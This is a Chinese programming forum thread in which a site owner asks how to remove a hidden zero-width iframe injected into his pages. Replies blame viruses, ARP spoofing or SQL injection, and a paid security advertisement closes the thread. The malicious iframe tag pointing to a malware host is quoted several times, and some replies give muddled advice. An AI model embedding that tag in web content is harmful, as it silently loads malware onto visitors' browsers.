跪求解决方法,程序被人插入iframe,急
我的 网站 程序被人插入iframe类似于
<iframe src=http://www.m85853.cn/yeye/index.htm width=0 height=0></iframe>
之类的东东, 真是急死人啦,google,baidu
只能找到解决的办法,但是 怎么彻底根治这个问题? 一直找不到
希望牛人们出出招啊? --------------------编程问答-------------------- 中病毒了,先杀毒
然后,自己写一个程序把,递归每一个文件,删掉
<iframe src=http://www.m85853.cn/yeye/index.htm width=0 height=0></iframe>
就可以了 --------------------编程问答-------------------- 服务器或者局域网中毒了! --------------------编程问答-------------------- 忘记了我是SF --------------------编程问答-------------------- 他简单了,常识,javascript
if (top.location != self.location)top.location=self.location; --------------------编程问答-------------------- //防止被别人“框”
var web = document.location;
if (top.location !== self.location) {
alert("你现在访问的是"+web+"\n 检测到你使用框架浏览本站内容,本页即将跳转到本站页面。\n 请不要使用框架跨站调用本站内容。\n 请遵守Creative Commons协议。");
top.location=self.location;
} --------------------编程问答-------------------- 楼上的 他现在是“框”了别人 不是被别人“框”了 --------------------编程问答-------------------- 服务器或者局域网中毒了!
同意这个,先检查你的服务器,再检查你的托管供应商 --------------------编程问答-------------------- 如果服务器上的文件确实包含了 上述代码 很不幸 你服务器中招了 估计是木马类的~
如果服务器上的文件不含上述代码,而浏览器浏览的时候含有,那很可能服务器所在机房有人用ARP欺骗
--------------------编程问答-------------------- 连框与被框都不清楚了
haha --------------------编程问答-------------------- 服务器或者局域网中毒了!
查你的服务器,再检查你的托管供应商
--------------------编程问答-------------------- 弄个好点的杀毒软件和防火墙 --------------------编程问答-------------------- 机子中毒了 杀毒吧!
不过记得先备份!杀毒软件有时候不分青红皂白! --------------------编程问答-------------------- 找服务器提供商
不一定是你服务器中毒,而是网关 --------------------编程问答-------------------- 这是ARP漏洞~局鱼网内中过~只要一台机器清除成功~就没了 --------------------编程问答-------------------- 服务器中毒,杀毒吧 --------------------编程问答-------------------- 杀毒,然后删掉那句话 --------------------编程问答-------------------- 下个360安全试试杀毒 --------------------编程问答-------------------- 关注! --------------------编程问答-------------------- 机器中毒了,很明显的东西,我这里也曾经有这种状况的,我的那个是 插入了loveqq什么的类似的链接,杀毒吧,然后把那些都删掉
--------------------编程问答-------------------- 杀毒 然后用VS05 替换 选择在整个项目 那样就可以全部替换了 替换内容为空就可以了
不用写递归方法了 --------------------编程问答-------------------- 前几天我遇到过我们一个客户的网站上加拉3个iframe啊,服务器提供商硬说程序有漏洞NND --------------------编程问答-------------------- jf --------------------编程问答-------------------- 我记得在网页的前面加个<META>类的东西,可以防止盗链。楼主可以查一下 --------------------编程问答-------------------- 杀毒,
检查自身程序是否有漏洞,
如果不是自身程序问题,很可能是服务器上中毒。可以跟管理员反映的。 --------------------编程问答-------------------- 可能是你的机器或者局域网 或者服务器机房 中毒 ARP 欺骗
处理方法 参考 于震blog
http://www.hatoyu.com/wordpress/2007/06/08/796.html --------------------编程问答-------------------- it's feel virus...pls kill it quickly --------------------编程问答-------------------- 被人注入了,我的网站也是,全都是毒,郁闷死了 --------------------编程问答-------------------- 还有一种就是ARP欺骗.当然也是中毒了 --------------------编程问答-------------------- 你在服务器页面文件中发现这行代码了吗?
1.如果没发现,可能是用户的计算机中毒了,arp病毒或者是ant指针漏洞,建议侦听用户局域网内所有机器流量,看哪台机器收包最多,那太机器就是病毒源,因为arp病毒是欺骗其他用户机器网关的一种病毒,中毒的机器被当作网关,收包自然多!
2.建议对服务器先安装补丁,尤其是ant指针漏洞补丁,然后进行杀毒(iis的那几个dll)。 --------------------编程问答-------------------- 我是这么搞的.
在CUTEFTP里将除了上传目录外的所有文件和文件夹设为只能读. --------------------编程问答-------------------- 杀, 删除那句话,在挂上去 --------------------编程问答-------------------- mark --------------------编程问答-------------------- 我上次也中这个毒了,很简单,用替换就可以了。全部替换。
<iframe src=http://www.m85853.cn/yeye/index.htm width=0 height=0></iframe>
替换成“”。之后就没问题了。 --------------------编程问答-------------------- 很多都是治标不治本的方法.希望有治本的方法,听说是系统漏洞! --------------------编程问答-------------------- 我也中了,把那句 话删除了就好了 --------------------编程问答-------------------- 我也中了,楼上各位说得都不具体!
你打开Dreamweaver,
DREAMWEAVER里点击“编辑”——“查找和替换”——搜索范围设定为“文件夹”,搜索设定为“源代码”,然后把想删除的地方的源码粘贴到“查找”的位置,然后在“替换”的位置敲一个回车或空格,然后点“替换全部”
记得给分!!! --------------------编程问答-------------------- 顶下,关注,好多人都中这个,哎.. --------------------编程问答-------------------- 如果楼主的数据库用的是MS SQL 2000,那就是数据库服务器没有在安全配置上管理好,被人通过系统存储过程之类的注入等安全漏洞间接修改了网页文件,建议楼主查阅MS SQL2000安全配置的有关资料,将有漏洞又不需要的系统存储过程删除,以及配置好会出问题的设置,打好windows与sql的系统安全补丁。 --------------------编程问答-------------------- 要么服务器中毒,要么就是网内ARP网页欺骗 --------------------编程问答-------------------- 可能是被ARP攻击了,先在网上搜个专杀,然后打上微软的ANI漏洞补丁,再安装一个ARP防火墙,如果还不行,那可能原因在局域网内的其它机子,这时可以打开ARP防火墙查看,应该会显示攻击你的局域网机器的IP,然后与网管协商,在该机上杀毒,问题应该可以解决。 --------------------编程问答-------------------- 你的 asp.net 编写问题,数据库过滤不严,我希望你把你的网址给出来。
这是基本的问题。
假如只是你的机器中了病毒的话,那问题就小了。但从安全角度来说,不可以这样认为。
基本认为 这是你的系统存在注入漏洞。
--------------------编程问答-------------------- mark --------------------编程问答-------------------- js:
if (top.location != self.location)
{
top.location=self.location;
} --------------------编程问答-------------------- 网页开发程序的模版被病毒改了,我也中过
先杀毒,然后用Dreamweaver的替换功能,把<iframe src=http://www.m85853.cn/yeye/index.htm width=0 height=0></iframe>
全部替换成空(用替换制定文件夹内的所有文件方法)。把所有盘符的文件替换
最好慢慢分几次来,不然一次性选太多机子会死的 --------------------编程问答-------------------- 呵呵 又学了一招
if(top.location != self.location) //不明白 怎么可能 不同呢 都是Window对像的属性
{
top.location = self.location
} --------------------编程问答-------------------- 用DW替换,是机器里所有文件,包括C/D/E等盘,如果是提供商得提供商解决,查毒 --------------------编程问答-------------------- mark --------------------编程问答-------------------- 先检查程序在看看服务器的安全..我前几天和你一样....哎 --------------------编程问答-------------------- 我有一个ASP站也经常易做图入代码,一般这两种可能,一 程序有漏洞,二服务器安全性能做的不好,而且这样易做图入是整站所有页面都易做图入,如果用DW来替换的非常麻烦,我因为也经常为此而烦恼所以专门找了一款替换软件,可以批量把插入的代码给替换掉,如果你需要的话可以给我发邮件,我会发给你的 zjnbxhl@yahoo.com.cn --------------------编程问答-------------------- 顶下先。 。。 --------------------编程问答-------------------- 先杀毒,然后检查代码,关闭一些目录的写权限,一般asp网站容易被别人加Iframe, 最后用DreamWeaver批量替换就成了。 --------------------编程问答-------------------- 如果你的iframe 是易做图在第一行,可以在它后面加上一句javascript解决!
<script>document.innerHTML="";</script>
可以尝试一下,这个方法比较适合asp网站
给分! --------------------编程问答-------------------- 这个跟病毒无关,本身就是网站自动给你的程序插入的guang告,不过给你的这个方法要是给管理员发现你可就惨了。。。。 --------------------编程问答-------------------- if(top.location != self.location) //不明白 怎么可能 不同呢 都是Window对像的属性
{
top.location = self.location
} --------------------编程问答-------------------- 恭喜中招,接分谢谢
if (top.location != self.location)top.location=self.location; --------------------编程问答-------------------- 2年前也碰过相同事情,服务器中毒了,杀。 --------------------编程问答-------------------- 日,为啥我打开这个贴子后出现了病毒,难道csdn的程序没有过滤这些<,,> --------------------编程问答-------------------- 中毒了. --------------------编程问答-------------------- 服务器安全方案 ¦服务器安全设置方案
[img=http://img04.taobao.com/bao/uploaded/i4/T100VaXlBejcBNBsc4_051923.jpg ][/img]
服务项目:
系统安全设置,系统服务优化,注销相关组件,磁盘安全设置,数据库安全设置,serv-u安全设置,应用安全策略,防DOS攻击,关闭危险端口,网站防止挂马
联系QQ:604743761 13031106182
收费:300元
不少选择我们做服务器安全服务的客户,一遇到网站被黑,就马上认为是我们安全没做好造成的.这是一种误解.
因为如果是客户的网站程序有问题,我们做服务器安全是无法解决的,只能保证服务器不受webshell入侵和威胁! 为每个站解决程序漏洞是不现实的.这是因为,黑客利用用户网站的漏洞,使用合法代码来修改用户网页,造成了网页易做图入代码,这种情况谁也无法防止.因为木马变种太多,很多是用合法操作的.正如您把钥匙给了别人来开您自己的门是一样的道理.例如洞网的漏洞使用的就是合法的代码入侵,这种情况是任何人都无法防止,但是做过安全可以保证只影响单个网站,不影响整台服务器。
您的服务器是否安全?请您从以下方面来了解:
首先,您的服务器如果严格按服务器反黑网安全工程师的安全指引来设置,我们可以确保您的服务器安全没有问题.
其次,您要分开识别以下的情况:
第一,如果是服务器上全部的网站都被增加了病毒代码,而且这个病毒代码,可以在服务器上的原始文件中找得到,表明您的服务器上的安全设置没有按照反黑网的要求来设置,导致了服务器上的原始文件被改写,造成了您的用户网站被入侵.您可能需要重新设置服务器的安全,一般的情况下,我们建议用户重装系统才能彻底防止黑客留下的后门.
第二,如果是服务器上全部的网站都被增加了病毒代码,但是在服务器上的原始文件中没有找到病毒代码,您需要在服务器上检查IIS中全局的网站过滤器有没有被增加了病毒插件?如果有病毒插件,就表明您的服务器安全设置有问题,被黑客入侵了服务器.如果原始文件没有找到病毒代码,IIS中也没有找到病毒插件,那这个问题就和您的服务器无关,原因很可能是:您服务器所在的机房中了ARP等病毒造成的,如果是这种问题,您只能联系机房找出ARP病毒的源头,隔离它后才能解决,您自己是无法处理,只能找机房解决.
第三,如果是服务器上有少量几个或者只有一个网站被加了病毒代码,或者被黑,那么很有可能您的用户的这个网站自己存在漏洞造成的.这个问题就不是主机商的责任了,也和反黑网的平台没有任何联系.因为,每个虚拟主机用户都有FSO权限,即您的用户如果被人上传了ASP程序,那么这个黑客使用合法的FSO权限想对这个用户网站的任何文件做什么都行。例如一些不安全的洞网论坛,被上传了可以执行的ASP程序,就可以删除光这个网站用户自己的内容.因此,这个和反黑网平台的安全无关,也不是主机商的问题。但是,我们可以是肯定的,如果您的服务器是在反黑网平台的安全保护措施下设置,就算这个用户被上传了ASP内容,,这个黑客也只能对自己的空间操作,而操作不了其他用户的空间,更控制不了主机商的服务器。
因此您无须担心服务器的安全.
补充:.NET技术 , ASP.NET
